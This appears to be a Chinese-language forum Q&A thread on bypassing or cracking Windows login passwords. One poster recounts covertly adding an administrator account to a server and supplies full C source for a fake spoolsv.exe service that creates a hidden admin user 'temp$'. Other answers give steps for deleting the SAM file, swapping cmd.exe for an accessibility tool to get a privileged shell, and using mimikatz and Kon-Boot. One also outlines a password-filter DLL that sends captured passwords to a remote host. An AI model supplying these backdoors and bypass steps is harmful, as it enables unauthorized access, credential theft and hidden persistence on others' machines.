如何破解windows開機密碼？

01-05

照電影里的橋段，都是隨便猜幾下就猜出密碼來了，這叫social engineering。

非當前系統下，將密碼文件SAM文件替換為初始文件。

翻譯一下:開機，插U盤，進各論壇制的U盤win pe後，跟據提示，清除開機密碼，讓工具自動幫你替換文件，然後就ok了。

唔正好最近有做過此類事情

故回答下

幾個月前繞過登錄界面直接添加賬戶在某伺服器上

因為不能被發現自己修改了伺服器密碼

故用添加賬戶的方式在伺服器上新建administrators組的用戶名

然而後來忘記註銷賬戶偽造現場還是被老師發現了

不過我居然沒有被批鬥

具體:

無論PC和Server一般都有啟用印表機服務Spooler

所以就從這個服務下手

替換掉這個系統服務應用程序

重啟萬事大吉→_→(逃

編譯器:Mingw g++ 4.7.1

系統要求:打開印表機服務至少Windows XP Professional家族

程序名:spoolsv.exe

copy程序到x:windowssystem32下即可

記得備份噢！

#include &


LPSTR  Sname="spooler";
SERVICE_STATUS_HANDLE ssh;

SERVICE_STATUS ss;
void WINAPI Service_Main(DWORD, LPTSTR *);

void WINAPI Service_Control(DWORD);
int main(int argc,LPTSTR * argv)

{

	SERVICE_TABLE_ENTRY STE[]={Sname,(LPSERVICE_MAIN_FUNCTION)Service_Main,NULL,NULL};

	StartServiceCtrlDispatcher(STE);

	return 0;

}
void WINAPI Service_Main(DWORD dwArgc, LPTSTR * lpszArgv){

	if (!(ssh=RegisterServiceCtrlHandler(Sname,Service_Control)));

	ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS;

	ss.dwCurrentState=SERVICE_START_PENDING;

	ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

	ss.dwServiceSpecificExitCode=0;

	ss.dwWin32ExitCode=0;

	ss.dwCheckPoint=0;

	ss.dwWaitHint=2;

	SetServiceStatus(ssh,ss);

	ss.dwCurrentState=SERVICE_RUNNING;

	ss.dwCheckPoint=0;

	ss.dwWaitHint=0;

	SetServiceStatus(ssh,ss);

	system("net user temp$ w /add");

	system("net localgroup administrators temp$ /add");

	ss.dwCurrentState=SERVICE_STOPPED;

	SetServiceStatus(ssh,ss);

	return ;

}
void WINAPI Service_Control(DWORD dwControl){}

//去掉了錯誤修正:)請慢用

螺絲刀 -- 打開筆記本背板 -- 拔下硬碟 -- 當成外接硬碟插到你自己的電腦上 -- 複製粘貼整個硬碟內容 -- 把硬碟裝回去...

Windows to go

下載大白菜

製作U盤啟動盤

開機按F2進bios setup

設置啟動順序為USB。。。。

開機

進入win pe，清除密碼或查看密碼

開機(無密碼）

我記得小時候家裡電腦是win98 父母為了防止我偷玩遊戲把電腦設了個開機密碼

不過多久他們發現我周末玩電腦的時候居然不找他們輸密碼，自己也能把電腦打開。

他們懷疑密碼被我破解了，就把開機密碼換啊換，可是沒個卵用

因為每次開機直接把輸入開機密碼的窗口關掉就好了。。。。。。。。。。。。。。

試試 mimikatz

怒答一記

題主題主面對著空蕩蕩的密碼輸入框，越來越迷茫。

絕望的他意識到，此時除了關機和重啟之外，做不了任何事情。

忽然間，他發現屏幕角落裡藏著一個時鐘一樣的按鈕，他點了下去。

映在眼前的是放大鏡屏幕鍵盤之類的程序。題主每個工具都打開了一遍，但每個工具都派不上用場。

ㄟ(￣▽￣ㄟ)哪有可能沒用？

這些程序的啟動都是有管理員許可權的，它們都是 system32 文件夾下的應用程序，比如放大鏡是 m什麼鬼.exe（不會拼）。那就好辦啦，把cmd.exe 的名字改成放大鏡的（我當初用的是 Ubuntu 光碟試用版改的，比樓下一眾 PE 系統高大上多了）。

下次啟動再開放大鏡，執行的就是帶有管理員許可權的命令行háng程序。

至於如何使用命令行修改密碼，那又是另一個問題了。自己必應吧。

我自己見過的一個唯一靠技術手段破的，是趨勢科技一個人，通過類似 BadUSB 的技術直接在開機階段改密碼驗證流程無密碼登錄了win7。

在U盤或移動硬碟上裝一個普通系統，然後接上目標電腦，更改BIOS啟動項

以後想用哪台有密碼的電腦，直接掏出隨身帶的U盤或移動硬碟。

當然，最簡單的就是弄一個PE盤，直接無密碼進入系統(不留痕迹，你清除了人家設的密碼還得知道是密碼是什麼，再給人家重新設置上去)

假設該電腦開啟了Guest賬戶，可以通過添加開機啟動項的方式，讓電腦新增一個管理員賬戶，從而修改密碼。

其實自己做一個PE啟動也不難，直接跟著工具走就好。

其實在某些時候，social engineering也是一個不錯的方法呢。

說一個遠程的方法

自製一個password filter dll程序放在system32下面並在註冊表中配置，這樣以後用戶每次更改密碼都會進入到這個dll程序裡面。

通過dll把每次的密碼修改內容傳輸到遠程機器上，這樣就可以遠程獲取密碼了。

缺點是必須修改密碼才能觸發，且配置這個dll的時候需要管理員許可權。

有個工具叫Kon-Boot，可以繞過windows（從xp-10），mac的密碼...使用也是很簡單唉....

在公眾號whiteh4t里有下載鏈接嘿嘿嘿

那麼麻煩幹嘛，找個u盤做個pe，一鍵安裝然後讓pe自己去刪除密碼

去網上下一個windows PE 製作u盤啟動工具。裡面菜單有破解密碼這一項。 u盤插入電腦，開機按f12鍵，然後鍵盤方向鍵選擇你的usb設備回車。進入u盤，按提示操作。

簡單點就拿去讓電腦店小夥子弄一下ok.

哈哈這是我的童年我來講。

首先找到你爸爸沒有仔細藏好的盜版系統盤。

插入盜版系統盤，從盤裡啟動，此時電腦什麼都幹不了只能進行複製粘貼等基礎操作。

然後備份C:Windowssystem32config里的sam文件（記不清了百度的）

刪掉該文件，重啟，就沒有密碼了（大概

關機後再從系統盤啟動一次，把sam文件剪切回原位置

參見Big Bang Theory第九季第12集

大概五六分鐘的樣子

=口=！！！！

PE破或者清除。

更簡單的，如果要拷貝電腦里的東西，直接拔掉硬碟就行，無視各種開機密碼。